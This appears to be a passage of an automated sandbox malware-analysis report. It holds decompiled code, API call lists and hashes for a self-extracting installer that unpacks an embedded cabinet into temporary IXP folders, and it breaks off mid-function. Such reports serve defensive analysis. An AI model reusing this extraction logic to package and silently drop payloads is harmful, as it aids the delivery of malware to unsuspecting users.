                                                                                                                                                                                                        0x00de5afd
                                                                                                                                                                                                        0x00de5aff
                                                                                                                                                                                                        0x00de5b00
                                                                                                                                                                                                        0x00de5b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b03
                                                                                                                                                                                                        0x00de5b05
                                                                                                                                                                                                        0x00de5b08
                                                                                                                                                                                                        0x00de5b20
                                                                                                                                                                                                        0x00de5b27
                                                                                                                                                                                                        0x00de5b52
                                                                                                                                                                                                        0x00de5b52
                                                                                                                                                                                                        0x00de5b5b
                                                                                                                                                                                                        0x00de5b62
                                                                                                                                                                                                        0x00de5b6b
                                                                                                                                                                                                        0x00de5b6d
                                                                                                                                                                                                        0x00de5b76
                                                                                                                                                                                                        0x00de5b7d
                                                                                                                                                                                                        0x00de5b83
                                                                                                                                                                                                        0x00de5b7f
                                                                                                                                                                                                        0x00de5b7f
                                                                                                                                                                                                        0x00de5b7f
                                                                                                                                                                                                        0x00de5b6f
                                                                                                                                                                                                        0x00de5b72
                                                                                                                                                                                                        0x00de5b72
                                                                                                                                                                                                        0x00de5b85
                                                                                                                                                                                                        0x00de5b98
                                                                                                                                                                                                        0x00de5b9e
                                                                                                                                                                                                        0x00de5b87
                                                                                                                                                                                                        0x00de5b8f
                                                                                                                                                                                                        0x00de5b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b85
                                                                                                                                                                                                        0x00de5b29
                                                                                                                                                                                                        0x00de5b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b35
                                                                                                                                                                                                        0x00de5b48
                                                                                                                                                                                                        0x00de5b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b4a
                                                                                                                                                                                                        0x00de5b0f
                                                                                                                                                                                                        0x00de5b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5b16
                                                                                                                                                                                                        0x00de5a7c
                                                                                                                                                                                                        0x00de5a8a
                                                                                                                                                                                                        0x00de5aa5
                                                                                                                                                                                                        0x00de5aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de59bb
                                                                                                                                                                                                        0x00de59c0
                                                                                                                                                                                                        0x00de59c7
                                                                                                                                                                                                        0x00de59d1
                                                                                                                                                                                                        0x00de59d6
                                                                                                                                                                                                        0x00de5c05
                                                                                                                                                                                                        0x00de5c14
                                                                                                                                                                                                        0x00de5c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00DE59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00DE59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00DE5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00DE5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00DE5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00DE5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00DE5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00DE5BFC
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: 9a027378aa901675de3d8244faa7aa1bac62a1c7778012e5195fbe9bc49d7bed
                                                                                                                                                                                                        • Instruction ID: 464195b626b12837e3a3281e6e80dd17ead8c946455453809f8844ae50d82b4d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a027378aa901675de3d8244faa7aa1bac62a1c7778012e5195fbe9bc49d7bed
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1271C2B190078CAFEB15EB25DCC5BFB77ACEB48384F1441A9F545D6244DA309E848B30
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 de4fe0-de501a call de468f FindResourceA LoadResource LockResource 377 de5020-de5027 374->377 378 de5161-de5163 374->378 379 de5029-de5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 de5057-de505e call de4efd 377->380 379->380 383 de507c-de50b4 380->383 384 de5060-de5077 call de44b9 380->384 389 de50e8-de5104 call de44b9 383->389 390 de50b6-de50da 383->390 388 de5107-de510e 384->388 392 de511d-de511f 388->392 393 de5110-de5117 FreeResource 388->393 402 de5106 389->402 401 de50dc 390->401 390->402 394 de513a-de5141 392->394 395 de5121-de5127 392->395 393->392 399 de515f 394->399 400 de5143-de514a 394->400 395->394 398 de5129-de5135 call de44b9 395->398 398->394 399->378 400->399 404 de514c-de5159 SendMessageA 400->404 405 de50e3-de50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00DE4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0xde9144 = E00DE468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xde9140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xde8584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xde8584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E00DE4EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E00DE4CA0, E00DE4CC0, E00DE4980, E00DE4A50, E00DE4AD0, E00DE4B60, E00DE4BC0, 1, 0xde9148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xde9148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xde8584; // 0x0
                                                                                                                                                                                                        						E00DE44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xde1140, 0, E00DE4CD0, 0, 0xde9140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xde8584; // 0x0
                                                                                                                                                                                                        					E00DE44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xde9140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xde9140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xde91d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E00DE44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xde8a38 & 0x00000001) == 0 && ( *0xde9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xde8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        0x00de4fe0
                                                                                                                                                                                                        0x00de4fe6
                                                                                                                                                                                                        0x00de4ff9
                                                                                                                                                                                                        0x00de500d
                                                                                                                                                                                                        0x00de5013
                                                                                                                                                                                                        0x00de501a
                                                                                                                                                                                                        0x00de5163
                                                                                                                                                                                                        0x00de5163
                                                                                                                                                                                                        0x00de5020
                                                                                                                                                                                                        0x00de5027
                                                                                                                                                                                                        0x00de5037
                                                                                                                                                                                                        0x00de5051
                                                                                                                                                                                                        0x00de5051
                                                                                                                                                                                                        0x00de5057
                                                                                                                                                                                                        0x00de505e
                                                                                                                                                                                                        0x00de50a7
                                                                                                                                                                                                        0x00de50ad
                                                                                                                                                                                                        0x00de50b4
                                                                                                                                                                                                        0x00de50e8
                                                                                                                                                                                                        0x00de50e8
                                                                                                                                                                                                        0x00de50ee
                                                                                                                                                                                                        0x00de50ff
                                                                                                                                                                                                        0x00de5104
                                                                                                                                                                                                        0x00de5106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5106
                                                                                                                                                                                                        0x00de50cd
                                                                                                                                                                                                        0x00de50d3
                                                                                                                                                                                                        0x00de50da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de50dd
                                                                                                                                                                                                        0x00de50e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5060
                                                                                                                                                                                                        0x00de5060
                                                                                                                                                                                                        0x00de5070
                                                                                                                                                                                                        0x00de5075
                                                                                                                                                                                                        0x00de5107
                                                                                                                                                                                                        0x00de5107
                                                                                                                                                                                                        0x00de510e
                                                                                                                                                                                                        0x00de5111
                                                                                                                                                                                                        0x00de5117
                                                                                                                                                                                                        0x00de5117
                                                                                                                                                                                                        0x00de511f
                                                                                                                                                                                                        0x00de5121
                                                                                                                                                                                                        0x00de5127
                                                                                                                                                                                                        0x00de5135
                                                                                                                                                                                                        0x00de5135
                                                                                                                                                                                                        0x00de5127
                                                                                                                                                                                                        0x00de5141
                                                                                                                                                                                                        0x00de5159
                                                                                                                                                                                                        0x00de5159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00DE4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00DE5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00DE500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00DE5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00DE5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00DE504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00DE5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00DE5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00DE5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 35011cb55a02caba9efdbc66e0973ff58c62453d0e9d50354fe9f6cb929515d4
                                                                                                                                                                                                        • Instruction ID: 7728fbcb9c47fbfbbcdd4274d483183ee2f385b26d2466106a1cfd586260cdd3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35011cb55a02caba9efdbc66e0973ff58c62453d0e9d50354fe9f6cb929515d4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A31D4B07417D27FD7207B67ADC9F67765CEB44799F080028F906EA3A5DAB49C009670
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00DE53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00DE171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E00DE1680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E00DE658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E00DE6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xde8a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00de53ac
                                                                                                                                                                                                        0x00de53b3
                                                                                                                                                                                                        0x00de53b9
                                                                                                                                                                                                        0x00de53bb
                                                                                                                                                                                                        0x00de53bd
                                                                                                                                                                                                        0x00de53bf
                                                                                                                                                                                                        0x00de53d1
                                                                                                                                                                                                        0x00de53d6
                                                                                                                                                                                                        0x00de53e0
                                                                                                                                                                                                        0x00de53e2
                                                                                                                                                                                                        0x00de53f5
                                                                                                                                                                                                        0x00de53fb
                                                                                                                                                                                                        0x00de5402
                                                                                                                                                                                                        0x00de540b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5415
                                                                                                                                                                                                        0x00de5416
                                                                                                                                                                                                        0x00de5427
                                                                                                                                                                                                        0x00de542a
                                                                                                                                                                                                        0x00de542b
                                                                                                                                                                                                        0x00de5434
                                                                                                                                                                                                        0x00de5434
                                                                                                                                                                                                        0x00de543a
                                                                                                                                                                                                        0x00de544c
                                                                                                                                                                                                        0x00de544c
                                                                                                                                                                                                        0x00de5452
                                                                                                                                                                                                        0x00de545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de545e
                                                                                                                                                                                                        0x00de545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE171E: _vsnprintf.MSVCRT ref: 00DE1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-390439592
                                                                                                                                                                                                        • Opcode ID: 5a863b693c9312334b2a03fd3713fc3b1b3a10550c0171ea5d96de2630671dc4
                                                                                                                                                                                                        • Instruction ID: 9777991d0e2f8b94b2b690895f4a57ecf14a83ee0b2046304ac0ae01202e2f2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a863b693c9312334b2a03fd3713fc3b1b3a10550c0171ea5d96de2630671dc4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9211277130068467D720BB3BAC89FAF7A6DEFC1765F000125F546D62D4CE749D8686B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 478 de5467-de5484 479 de551c-de5528 call de1680 478->479 480 de548a-de5490 call de53a1 478->480 484 de552d-de5539 call de58c8 479->484 483 de5495-de5497 480->483 485 de549d-de54c0 call de1781 483->485 486 de5581-de5583 483->486 493 de554d-de5552 484->493 494 de553b-de5545 CreateDirectoryA 484->494 497 de550c-de551a call de658a 485->497 498 de54c2-de54d8 GetSystemInfo 485->498 489 de558d-de559d call de6ce0 486->489 495 de5554-de5557 call de597d 493->495 496 de5585-de558b 493->496 500 de5577-de557c call de6285 494->500 501 de5547 494->501 507 de555c-de555e 495->507 496->489 497->484 505 de54fe 498->505 506 de54da-de54dd 498->506 500->486 501->493 508 de5503-de5507 call de658a 505->508 511 de54df-de54e2 506->511 512 de54f7-de54fc 506->512 507->496 513 de5560-de5566 507->513 508->497 515 de54e4-de54e7 511->515 516 de54f0-de54f5 511->516 512->508 513->486 518 de5568-de5575 RemoveDirectoryA 513->518 515->497 517 de54e9-de54ee 515->517 516->508 517->508 518->486
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00DE5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xde91e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00DE1680(0xde91e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E00DE58C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E00DE6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E00DE597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xde8a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xde8a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xde8a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E00DE53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xde91e4;
                                                                                                                                                                                                        				E00DE1781(0xde91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xde9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00DE658A(_t48, 0x104, 0xde1140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E00DE658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
